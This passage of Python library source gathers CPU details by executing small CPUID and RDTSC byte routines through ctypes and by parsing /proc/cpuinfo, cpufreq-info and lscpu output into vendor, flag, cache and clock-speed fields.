info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
info['hz_actual'] = _hz_short_to_full(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def _parse_arch(arch_string_raw):
import re
arch, bits = None, None
arch_string_raw = arch_string_raw.lower()
# X86
if re.match('^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', arch_string_raw):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', arch_string_raw):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^armv8-a|aarch64$', arch_string_raw):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', arch_string_raw):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', arch_string_raw):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', arch_string_raw):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', arch_string_raw):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', arch_string_raw):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', arch_string_raw):
arch = 'SPARC_64'
bits = 64
# S390X
elif re.match('^s390x$', arch_string_raw):
arch = 'S390X'
bits = 64
return (arch, bits)
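# Illustrative examples (added): _parse_arch('x86_64') -> ('X86_64', 64),
# _parse_arch('aarch64') -> ('ARM_8', 64); unrecognised strings return (None, None).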
def _is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
def _is_selinux_enforcing():
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return False
# Run the sestatus, and just return if it failed to run
returncode, output = DataSource.sestatus_b()
if returncode != 0:
return False
# Figure out if explicitly in enforcing mode
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("current mode:"):
if line.endswith("enforcing"):
return True
else:
return False
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = False
can_selinux_exec_memory = False
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("allow_execheap") and line.endswith("on"):
can_selinux_exec_heap = True
elif line.startswith("allow_execmem") and line.endswith("on"):
can_selinux_exec_memory = True
return (not can_selinux_exec_heap or not can_selinux_exec_memory)
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = _is_selinux_enforcing()
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
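# Note (added for clarity): _asm_func returns both the ctypes callable and the raw
# buffer address so that _run_asm below can release the executable segment
# (VirtualFree on Windows, mprotect + free elsewhere) after the call.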
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each byte of EBX, EDX, ECX is an ASCII character of the vendor ID
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x00", # mov eax,0x1"
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : _is_bit_set(edx, 0),
'vme' : _is_bit_set(edx, 1),
'de' : _is_bit_set(edx, 2),
'pse' : _is_bit_set(edx, 3),
'tsc' : _is_bit_set(edx, 4),
'msr' : _is_bit_set(edx, 5),
'pae' : _is_bit_set(edx, 6),
'mce' : _is_bit_set(edx, 7),
'cx8' : _is_bit_set(edx, 8),
'apic' : _is_bit_set(edx, 9),
#'reserved1' : _is_bit_set(edx, 10),
'sep' : _is_bit_set(edx, 11),
'mtrr' : _is_bit_set(edx, 12),
'pge' : _is_bit_set(edx, 13),
'mca' : _is_bit_set(edx, 14),
'cmov' : _is_bit_set(edx, 15),
'pat' : _is_bit_set(edx, 16),
'pse36' : _is_bit_set(edx, 17),
'pn' : _is_bit_set(edx, 18),
'clflush' : _is_bit_set(edx, 19),
#'reserved2' : _is_bit_set(edx, 20),
'dts' : _is_bit_set(edx, 21),
'acpi' : _is_bit_set(edx, 22),
'mmx' : _is_bit_set(edx, 23),
'fxsr' : _is_bit_set(edx, 24),
'sse' : _is_bit_set(edx, 25),
'sse2' : _is_bit_set(edx, 26),
'ss' : _is_bit_set(edx, 27),
'ht' : _is_bit_set(edx, 28),
'tm' : _is_bit_set(edx, 29),
'ia64' : _is_bit_set(edx, 30),
'pbe' : _is_bit_set(edx, 31),
'pni' : _is_bit_set(ecx, 0),
'pclmulqdq' : _is_bit_set(ecx, 1),
'dtes64' : _is_bit_set(ecx, 2),
'monitor' : _is_bit_set(ecx, 3),
'ds_cpl' : _is_bit_set(ecx, 4),
'vmx' : _is_bit_set(ecx, 5),
'smx' : _is_bit_set(ecx, 6),
'est' : _is_bit_set(ecx, 7),
'tm2' : _is_bit_set(ecx, 8),
'ssse3' : _is_bit_set(ecx, 9),
'cid' : _is_bit_set(ecx, 10),
#'reserved3' : _is_bit_set(ecx, 11),
'fma' : _is_bit_set(ecx, 12),
'cx16' : _is_bit_set(ecx, 13),
'xtpr' : _is_bit_set(ecx, 14),
'pdcm' : _is_bit_set(ecx, 15),
#'reserved4' : _is_bit_set(ecx, 16),
'pcid' : _is_bit_set(ecx, 17),
'dca' : _is_bit_set(ecx, 18),
'sse4_1' : _is_bit_set(ecx, 19),
'sse4_2' : _is_bit_set(ecx, 20),
'x2apic' : _is_bit_set(ecx, 21),
'movbe' : _is_bit_set(ecx, 22),
'popcnt' : _is_bit_set(ecx, 23),
'tscdeadline' : _is_bit_set(ecx, 24),
'aes' : _is_bit_set(ecx, 25),
'xsave' : _is_bit_set(ecx, 26),
'osxsave' : _is_bit_set(ecx, 27),
'avx' : _is_bit_set(ecx, 28),
'f16c' : _is_bit_set(ecx, 29),
'rdrnd' : _is_bit_set(ecx, 30),
'hypervisor' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC9", # xor ecx,ecx
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : _is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : _is_bit_set(ebx, 1),
'sgx' : _is_bit_set(ebx, 2),
'bmi1' : _is_bit_set(ebx, 3),
'hle' : _is_bit_set(ebx, 4),
'avx2' : _is_bit_set(ebx, 5),
#'reserved' : _is_bit_set(ebx, 6),
'smep' : _is_bit_set(ebx, 7),
'bmi2' : _is_bit_set(ebx, 8),
'erms' : _is_bit_set(ebx, 9),
'invpcid' : _is_bit_set(ebx, 10),
'rtm' : _is_bit_set(ebx, 11),
'pqm' : _is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : _is_bit_set(ebx, 13),
'mpx' : _is_bit_set(ebx, 14),
'pqe' : _is_bit_set(ebx, 15),
'avx512f' : _is_bit_set(ebx, 16),
'avx512dq' : _is_bit_set(ebx, 17),
'rdseed' : _is_bit_set(ebx, 18),
'adx' : _is_bit_set(ebx, 19),
'smap' : _is_bit_set(ebx, 20),
'avx512ifma' : _is_bit_set(ebx, 21),
'pcommit' : _is_bit_set(ebx, 22),
'clflushopt' : _is_bit_set(ebx, 23),
'clwb' : _is_bit_set(ebx, 24),
'intel_pt' : _is_bit_set(ebx, 25),
'avx512pf' : _is_bit_set(ebx, 26),
'avx512er' : _is_bit_set(ebx, 27),
'avx512cd' : _is_bit_set(ebx, 28),
'sha' : _is_bit_set(ebx, 29),
'avx512bw' : _is_bit_set(ebx, 30),
'avx512vl' : _is_bit_set(ebx, 31),
'prefetchwt1' : _is_bit_set(ecx, 0),
'avx512vbmi' : _is_bit_set(ecx, 1),
'umip' : _is_bit_set(ecx, 2),
'pku' : _is_bit_set(ecx, 3),
'ospke' : _is_bit_set(ecx, 4),
#'reserved' : _is_bit_set(ecx, 5),
'avx512vbmi2' : _is_bit_set(ecx, 6),
#'reserved' : _is_bit_set(ecx, 7),
'gfni' : _is_bit_set(ecx, 8),
'vaes' : _is_bit_set(ecx, 9),
'vpclmulqdq' : _is_bit_set(ecx, 10),
'avx512vnni' : _is_bit_set(ecx, 11),
'avx512bitalg' : _is_bit_set(ecx, 12),
#'reserved' : _is_bit_set(ecx, 13),
'avx512vpopcntdq' : _is_bit_set(ecx, 14),
#'reserved' : _is_bit_set(ecx, 15),
#'reserved' : _is_bit_set(ecx, 16),
#'mpx0' : _is_bit_set(ecx, 17),
#'mpx1' : _is_bit_set(ecx, 18),
#'mpx2' : _is_bit_set(ecx, 19),
#'mpx3' : _is_bit_set(ecx, 20),
#'mpx4' : _is_bit_set(ecx, 21),
'rdpid' : _is_bit_set(ecx, 22),
#'reserved' : _is_bit_set(ecx, 23),
#'reserved' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
#'reserved' : _is_bit_set(ecx, 26),
#'reserved' : _is_bit_set(ecx, 27),
#'reserved' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
'sgx_lc' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : _is_bit_set(ebx, 0),
'vme' : _is_bit_set(ebx, 1),
'de' : _is_bit_set(ebx, 2),
'pse' : _is_bit_set(ebx, 3),
'tsc' : _is_bit_set(ebx, 4),
'msr' : _is_bit_set(ebx, 5),
'pae' : _is_bit_set(ebx, 6),
'mce' : _is_bit_set(ebx, 7),
'cx8' : _is_bit_set(ebx, 8),
'apic' : _is_bit_set(ebx, 9),
#'reserved' : _is_bit_set(ebx, 10),
'syscall' : _is_bit_set(ebx, 11),
'mtrr' : _is_bit_set(ebx, 12),
'pge' : _is_bit_set(ebx, 13),
'mca' : _is_bit_set(ebx, 14),
'cmov' : _is_bit_set(ebx, 15),
'pat' : _is_bit_set(ebx, 16),
'pse36' : _is_bit_set(ebx, 17),
#'reserved' : _is_bit_set(ebx, 18),
'mp' : _is_bit_set(ebx, 19),
'nx' : _is_bit_set(ebx, 20),
#'reserved' : _is_bit_set(ebx, 21),
'mmxext' : _is_bit_set(ebx, 22),
'mmx' : _is_bit_set(ebx, 23),
'fxsr' : _is_bit_set(ebx, 24),
'fxsr_opt' : _is_bit_set(ebx, 25),
'pdpe1gp' : _is_bit_set(ebx, 26),
'rdtscp' : _is_bit_set(ebx, 27),
#'reserved' : _is_bit_set(ebx, 28),
'lm' : _is_bit_set(ebx, 29),
'3dnowext' : _is_bit_set(ebx, 30),
'3dnow' : _is_bit_set(ebx, 31),
'lahf_lm' : _is_bit_set(ecx, 0),
'cmp_legacy' : _is_bit_set(ecx, 1),
'svm' : _is_bit_set(ecx, 2),
'extapic' : _is_bit_set(ecx, 3),
'cr8_legacy' : _is_bit_set(ecx, 4),
'abm' : _is_bit_set(ecx, 5),
'sse4a' : _is_bit_set(ecx, 6),
'misalignsse' : _is_bit_set(ecx, 7),
'3dnowprefetch' : _is_bit_set(ecx, 8),
'osvw' : _is_bit_set(ecx, 9),
'ibs' : _is_bit_set(ecx, 10),
'xop' : _is_bit_set(ecx, 11),
'skinit' : _is_bit_set(ecx, 12),
'wdt' : _is_bit_set(ecx, 13),
#'reserved' : _is_bit_set(ecx, 14),
'lwp' : _is_bit_set(ecx, 15),
'fma4' : _is_bit_set(ecx, 16),
'tce' : _is_bit_set(ecx, 17),
#'reserved' : _is_bit_set(ecx, 18),
'nodeid_msr' : _is_bit_set(ecx, 19),
#'reserved' : _is_bit_set(ecx, 20),
'tbm' : _is_bit_set(ecx, 21),
'topoext' : _is_bit_set(ecx, 22),
'perfctr_core' : _is_bit_set(ecx, 23),
'perfctr_nb' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
'dbx' : _is_bit_set(ecx, 26),
'perftsc' : _is_bit_set(ecx, 27),
'pci_l2i' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
#'reserved' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
import time
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
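# Note (added for clarity): get_raw_hz measures the TSC tick delta across a one
# second sleep, so the returned count approximates the CPU frequency in Hz.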
def _get_cpu_info_from_cpuid_actual():
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
# Return none if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
return {}
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = _to_decimal_string(hz_actual)
# Get the Hz and scale
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
info = {
'vendor_id_raw' : cpuid.get_vendor_id(),
'hardware_raw' : '',
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : _to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
return info
def _get_cpu_info_from_cpuid_subprocess_wrapper(queue):
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
info = _get_cpu_info_from_cpuid_actual()
queue.put(_obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
if CAN_CALL_CPUID_IN_SUBPROCESS:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_get_cpu_info_from_cpuid_subprocess_wrapper, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return _b64_to_obj(output)
else:
return _get_cpu_info_from_cpuid_actual()
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Check for other cache format
if not cache_size:
try:
for i in range(0, 10):
name = "cache{0}".format(i)
value = _get_field(False, output, None, None, name)
if value:
value = [entry.split('=') for entry in value.split(' ')]
value = dict(value)
if 'level' in value and value['level'] == '3' and 'size' in value:
cache_size = value['size']
break
except Exception:
pass
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock', 'cpu MHz dynamic', 'cpu MHz static')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = _to_decimal_string(hz_actual)
# Convert from GHz/MHz string to Hz
hz_advertised, scale = (None, 0)
try:
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
except Exception:
pass
info = {
'hardware_raw' : hardware,
'brand_raw' : processor_brand,
'l3_cache_size' : _to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id_raw' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if _hz_short_to_full(hz_advertised, scale) > (0, 0):
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
if _hz_short_to_full(hz_actual, scale) > (0, 0):
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, 6)
info['hz_actual'] = _hz_short_to_full(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
hz_brand, scale = '0.0', 0
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = _to_decimal_string(hz_brand)
info = {
'hz_advertised_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_advertised' : _hz_short_to_full(hz_brand, scale),
'hz_actual' : _hz_short_to_full(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
new_hz = _get_field(False, output, None, None, 'CPU dynamic MHz', 'CPU static MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id_raw'] = vendor_id
